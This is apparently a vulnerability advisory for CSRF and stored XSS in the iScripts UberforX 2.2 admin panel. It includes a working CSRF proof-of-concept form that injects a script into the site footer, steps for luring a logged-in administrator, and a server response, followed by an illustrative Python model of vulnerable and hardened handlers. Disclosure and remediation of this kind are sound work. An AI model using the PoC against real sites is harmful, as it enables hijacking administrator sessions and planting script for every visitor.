iScripts UberforX 2.2 CSRF & Stored XSS in Admin Panel

Authors: Korprit Zombie        Risk: High
CVE: CVE-2018-10137            0day: CSRF
CVE: CVE-2018-10136            0day: XSS
CVE: CVE-2018-10135            0day: XSS
0day-id: 0DAY-10137            Date: 2018-04-17



iScripts UberforX 2.2 has CSRF in the “manage_settings” section of the Admin Panel: the settings form posted to the /cms?section=manage_settings&action=edit URI carries no anti-CSRF token, so a logged-in administrator can be made to save arbitrary settings.


iScripts UberforX 2.2 has Stored XSS in the same “manage_settings” section of the Admin Panel: the cms_set_value field posted to the /cms?section=manage_settings&action=edit URI is stored and later rendered unescaped in the page footer.


iScripts eSwap v2.4 (a separate iScripts product listed in the same advisory) has Reflected XSS via the catid parameter of “catwiseproducts.php” in the User Panel.


# Exploit title: iScripts UberforX 2.2 - CSRF & Stored XSS in Admin Panel
# Date: 16/04/2018
# Exploit Author: ManhNho
# Vendor Homepage:
# Software Link:
# Demo Link:
# Version: 2.2
# CVE: CVE-2018-10135 CVE-2018-10136 CVE-2018-10137
# Tested on: Windows 10 / Kali Linux
# Category: Webapps

a) Host the page below on an attacker-controlled site and get a user who is logged in to the CMS with Root Administrator rights to open it. The settings form is accepted on the strength of the session cookie alone (no anti-CSRF token, no Origin/Referer check), so the browser attaches the admin session and the request goes through.
  <!-- CSRF PoC - ManhNho -->
  <!-- action is left empty in the original PoC; point it at the victim's
       /cms?section=manage_settings&action=edit endpoint when testing -->
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="cms&#95;set&#95;name" value="admin&#95;copyright" />
      <input type="hidden" name="cms&#95;set&#95;value" value="&lt;script&gt;alert&#40;&apos;1&apos;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
b) Once the logged-in administrator opens the page and the form is submitted (the PoC uses a visible button; an auto-submitting variant behaves the same), the request is sent with the active root administrator session and the admin_copyright setting is overwritten with the script payload. Because that value is written into the page footer without output encoding, every page that renders the footer now pops an alert '1' (stored XSS).
Truncated server response after the save, showing the payload echoed unescaped in the footer:
HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 07:44:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 28359
<div class="footer row-fluid">
<p class="muted"><small><script>alert('1')</script></small></p>
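To make the two defects and their fix concrete, here is an added example (mine, not iScripts' code; UberforX itself is PHP, this is an illustrative Python model) of the settings-save handler in its vulnerable form beside a hardened one. The in-memory SETTINGS and SESSIONS stores, the SITE_ORIGIN value, the csrf_token field name and the function names are all assumptions for the example; the request body is the advisory's own PoC form, URL-encoded as a browser would submit it.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs

# Constructed in-memory stand-ins for the CMS settings table and the admin
# session store; these names are illustrative, not UberforX's own.
SETTINGS = {"admin_copyright": "Copyright 2018 Example Ltd"}
SESSIONS = {}  # session id -> {"csrf_token": str}
SITE_ORIGIN = "https://cms.example"  # assumed origin of the admin panel


def new_admin_session():
    """Log an administrator in; a per-session anti-CSRF token is minted alongside."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_hex(32)}
    return sid


def render_footer_vulnerable():
    # Setting value interpolated raw, which is what the response above shows.
    return '<p class="muted"><small>%s</small></p>' % SETTINGS["admin_copyright"]


def render_footer_hardened():
    # Context-aware output encoding for an HTML text node (quotes included).
    return '<p class="muted"><small>%s</small></p>' % html.escape(
        SETTINGS["admin_copyright"], quote=True)


def save_setting_vulnerable(session_id, body):
    """Mirrors the advisory: a valid admin cookie is the only check, so a
    cross-site auto-submitted form is honoured and the value stored verbatim."""
    if session_id not in SESSIONS:
        return 403, "login required"
    form = parse_qs(body)
    SETTINGS[form["cms_set_name"][0]] = form["cms_set_value"][0]
    return 200, render_footer_vulnerable()


def save_setting_hardened(session_id, body, origin=None):
    """Same endpoint with a synchronizer token bound to the session, an Origin
    check whenever the browser sends one, a setting-name allow-list, and
    escaped output."""
    if session_id not in SESSIONS:
        return 403, "login required"
    # Browsers send Origin on cross-site POSTs; a mismatch is a cheap early reject.
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    form = parse_qs(body)
    token = form.get("csrf_token", [""])[0]
    # Constant-time compare against the token minted for this session.
    if not hmac.compare_digest(token, SESSIONS[session_id]["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    name = form.get("cms_set_name", [""])[0]
    if name not in SETTINGS:  # only known settings may be edited
        return 400, "unknown setting"
    SETTINGS[name] = form.get("cms_set_value", [""])[0]
    return 200, render_footer_hardened()


# The advisory's PoC form body, URL-encoded as a browser submits hidden inputs.
POC_BODY = ("id=2&cms_set_name=admin_copyright"
            "&cms_set_value=%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E"
            "&submit=Save")

if __name__ == "__main__":
    sid = new_admin_session()
    # Vulnerable path: cross-site POST accepted, raw <script> lands in the footer.
    print(save_setting_vulnerable(sid, POC_BODY))
    # Hardened path: same POST from attacker.example is rejected before any write.
    print(save_setting_hardened(sid, POC_BODY, origin="https://attacker.example"))
    # Legitimate same-origin save with the token: stored, but rendered escaped.
    print(save_setting_hardened(sid, POC_BODY + "&csrf_token=" + SESSIONS[sid]["csrf_token"],
                                origin=SITE_ORIGIN))
```

The token check is what stops the CSRF; the Origin comparison is defence in depth for browsers that send it, and output encoding is what stops the stored XSS even when an administrator legitimately saves a value containing markup. A SameSite=Lax or Strict attribute on the session cookie would close the cross-site POST vector as well, but the token should stay, since it also covers clients and same-site subdomains that SameSite does not.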
